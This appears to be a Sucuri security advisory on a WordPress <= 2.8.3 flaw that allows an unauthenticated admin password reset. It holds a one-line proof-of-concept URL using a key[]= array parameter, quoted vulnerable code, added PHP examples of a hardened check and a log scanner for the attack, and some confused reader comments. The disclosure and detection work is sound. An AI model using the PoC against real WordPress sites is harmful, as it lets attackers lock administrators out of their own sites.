WordPress <= 2.8.3 Remote admin reset password

How to annoy a WordPress admin? By changing their password without confirmation…


III. DESCRIPTION
————————-
The way WordPress handles a password reset looks like this:
You submit your email address or username via the form at
/wp-login.php?action=lostpassword ;
WordPress then sends you a reset confirmation by email, like this one:


Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag

You click on the link, WordPress resets the password of that account, and
sends you another email with the new credentials.

Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
	global $wpdb;

	// Blacklist: characters outside [a-z0-9] are stripped rather than rejected.
	$key = preg_replace('/[^a-z0-9]/i', '', $key);

	// The only validation of $key before it reaches the query.
	if ( empty( $key ) )
		return new WP_Error('invalid_key', __('Invalid key'));

	$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
	if ( empty( $user ) )
		return new WP_Error('invalid_key', __('Invalid key'));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

// Any request carrying a key parameter is routed to the reset code,
// whatever action= says.
if ( isset($_GET['key']) )
	$action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
	$action = 'login';
…[snip]….

line 370:

	break;

	case 'resetpass' :
	case 'rp' :
		// $_GET['key'] is passed through untouched; key[]= makes it an array.
		$errors = reset_password($_GET['key']);

		if ( ! is_wp_error($errors) ) {
			wp_redirect('wp-login.php?checkemail=newpass');
			exit();
		}

		wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
		exit();

	break;
…[snip ]…

The key validation is a blacklist: preg_replace() strips the characters it does
not like instead of rejecting anything that is not a plain alphanumeric string.
PHP turns key[]= into $_GET['key'] = array(''), preg_replace() on an array returns
an array, and a one-element array is never empty(), so the only check passes.
$wpdb->prepare() then fills %s from that array with the empty string, the query
becomes WHERE user_activation_key = '', and the first user whose stored key is
blank is matched: normally the admin, who never requested a reset. The first
step (asking for a reset for a named user or email) is skipped entirely and the
admin password is reset.
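To make the type juggling concrete, here is an added example (not WordPress code and not part of the advisory) that reproduces the check from reset_password() against an in-memory user list and places a whitelist-based version next to it. The user rows, the activation key value and the helper find_user_by_key() are constructed stand-ins for $wpdb and its prepare()/get_row() calls.

```php
<?php
// Added example (not WordPress code): the reset-key handling shown above,
// reduced to its validation logic, next to a hardened version. The in-memory
// user list and find_user_by_key() are stand-ins for $wpdb.

// Constructed users table. user_activation_key is blank until a reset has
// been requested, which is the normal state of the admin account.
$users = array(
    array('ID' => 1, 'user_login' => 'admin',  'user_activation_key' => ''),
    array('ID' => 2, 'user_login' => 'editor', 'user_activation_key' => 'o7naCKN3OoeU2KJMMsag'),
);

// Stand-in for $wpdb->prepare("... WHERE user_activation_key = %s", $key)
// followed by get_row(): returns the first user whose stored key equals the
// supplied value. wpdb::prepare() also accepts its arguments as one array
// (vsprintf style), which is why array('') ends up formatted into %s as ''.
function find_user_by_key(array $users, $key) {
    if (is_array($key)) {
        $key = isset($key[0]) ? $key[0] : '';
    }
    foreach ($users as $user) {
        if ($user['user_activation_key'] === (string) $key) {
            return $user;
        }
    }
    return null;
}

// Behaviour of the 2.8.x check: strip disallowed characters, then reject
// only when the result is empty(). preg_replace() on an array returns an
// array, and a one-element array is never empty(), so array('') gets through.
function vulnerable_lookup(array $users, $key) {
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if (empty($key)) {
        return 'invalid_key';
    }
    $user = find_user_by_key($users, $key);
    return $user ? $user['user_login'] : 'invalid_key';
}

// Hardened check: the key must be a non-empty string made only of
// [A-Za-z0-9] (a whitelist, not strip-and-hope), and a user whose stored
// key is blank has no reset pending and must never match.
function hardened_lookup(array $users, $key) {
    if (!is_string($key) || $key === '' || !ctype_alnum($key)) {
        return 'invalid_key';
    }
    $user = find_user_by_key($users, $key);
    if (!$user || $user['user_activation_key'] === '') {
        return 'invalid_key';
    }
    return $user['user_login'];
}

// ?action=rp&key[]= arrives in PHP as $_GET['key'] === array('').
$attack = array('');
$valid  = 'o7naCKN3OoeU2KJMMsag';

echo "vulnerable, key[]=:      ", vulnerable_lookup($users, $attack), "\n";
echo "hardened,   key[]=:      ", hardened_lookup($users, $attack), "\n";
echo "vulnerable, real key:    ", vulnerable_lookup($users, $valid), "\n";
echo "hardened,   real key:    ", hardened_lookup($users, $valid), "\n";
echo "hardened,   key with ..: ", hardened_lookup($users, $valid . '..'), "\n";
```

Run it with the php CLI. In the vulnerable path the array survives preg_replace() and empty() and is compared against the admin row, whose activation key is blank; in the hardened path anything that is not a plain alphanumeric string is refused before any lookup, a key with stray characters is rejected instead of silently cleaned, and a blank stored key can never be matched even if a blank value slipped through.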

IV. PROOF OF CONCEPT
————————-
A web browser is sufficient to reproduce this proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password is reset without any confirmation.
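Because the PoC is a single GET request, attempts against a site leave a recognisable trace in the web server log. The following is an added example, not part of the advisory, that scans combined-format access log lines for requests to wp-login.php whose key parameter arrives as an array (key[]= or its percent-encoded form key%5B%5D=). The log lines are constructed for this example and use documentation IP ranges.

```php
<?php
// Added example (not from the advisory): flag requests to wp-login.php whose
// key parameter is an array, the shape of the PoC URL. The log lines below
// are constructed for this example; the IP addresses are documentation ranges.
$log = <<<'LOG'
203.0.113.7 - - [11/Aug/2009:14:02:11 +0000] "GET /wp-login.php?action=rp&key[]= HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Aug/2009:14:02:12 +0000] "GET /wp-login.php?checkemail=newpass HTTP/1.1" 200 1482 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Aug/2009:14:05:40 +0000] "GET /wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Aug/2009:14:06:01 +0000] "GET /wordpress/wp-login.php?key%5B%5D=x&action=login HTTP/1.1" 302 0 "-" "curl/7.19.7"
192.0.2.9 - - [11/Aug/2009:14:07:15 +0000] "GET /index.php?p=12&key[]=a HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
LOG;

// Returns one entry per suspicious request: client IP, timestamp, request target.
function find_array_key_resets($log) {
    $hits = array();
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Client IP, timestamp and request target from the combined log format.
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) /', $line, $m)) {
            continue;
        }
        list(, $ip, $when, $target) = $m;
        $path  = (string) parse_url($target, PHP_URL_PATH);
        $query = (string) parse_url($target, PHP_URL_QUERY);
        if (basename($path) !== 'wp-login.php' || $query === '') {
            continue;
        }
        // parse_str() decodes and structures the query the same way PHP built
        // $_GET on the server, so key[]= and key%5B%5D= both become an array.
        parse_str($query, $params);
        // Per the wp-login.php code above, any request carrying a key
        // parameter is routed to the reset code whatever action= says, so
        // the action value is deliberately not used as a filter here.
        if (isset($params['key']) && is_array($params['key'])) {
            $hits[] = array('ip' => $ip, 'time' => $when, 'target' => $target);
        }
    }
    return $hits;
}

foreach (find_array_key_resets($log) as $hit) {
    printf("%-15s %s %s\n", $hit['ip'], $hit['time'], $hit['target']);
}
```

The legitimate reset (a plain string key) and the unrelated index.php request are left alone; only wp-login.php requests whose key is an array are reported. A 302 to wp-login.php?checkemail=newpass right after such a request, as in the first two constructed lines, is what a successful reset looks like from the server side.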

V. BUSINESS IMPACT
————————-
An attacker can reset the admin password of any WordPress / WordPress MU
installation up to and including 2.8.3, needing nothing but the site URL. The
new password is mailed to the admin's own address (see above), so the direct
effect is a lockout until the admin reads that mail, not disclosure of the
credentials to the attacker.

The patch? A one-line fix: http://core.trac.wordpress.org/changeset/11798. The problem? The code still relies on a blacklist (stripping characters it dislikes) instead of a whitelist of exactly what a reset key is allowed to look like.

About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • http://www.blogger.com/profile/10459565444725126210 skanksinnyc

    does not work

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    I was testing it over here and noticed that only works on WordPress 2.8.0, 2.8.1, 2.8.2 and 2.8.3…

    I guess they didn't test on <= 2.7 versions.

  • Anonymous

    Only works on 2.8.x versions.

  • http://www.blogger.com/profile/04955230631148691466 Lane

    I don't get it. You have to supply the email address that belongs to a registered user. Where is the hacker going to get that?

  • http://www.blogger.com/profile/05376454374607771065 BlackTigerX

    The hack is not about getting access or getting the password at all, just changing it.

  • http://www.blogger.com/profile/04955230631148691466 Lane

    I tried the function, and it sends an email to the registered user. Unless the registered user chooses to change the password it remains the same.

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Lane:

    It only works on 2.8.x versions. It gives you the option to reset using the user name (admin only) or the email…

  • Anonymous

    It's telling the amount of kiddies trying this and failing. I can attest that it works, as I had my own blog's admin pass changed through an anon proxy, so it seems there are people actively exploiting this. I just fixed mine through the line 190 edit – thanks!

  • http://www.blogger.com/profile/04955230631148691466 Lane

    OK, I think I see how it works now. I have a blog running 2.8.3. At login, I click "Lost your password?" and am presented with a page where I can enter either a username or an email. So entering "admin" would reset the password without further action? Weird!

    I've made the line 190 edit and will start copying it to my blogs. Thanks, Sucuri, for this post.

  • http://anhblog.net SEO Tips

    It's helpful. Thanks for great tips

  • Pingback: My final Wordpress security solution

  • Mehdi Fracso

    It exists, but you must have access to the database and then disclose the login and the activation key, for example with an SQL injection vulnerability.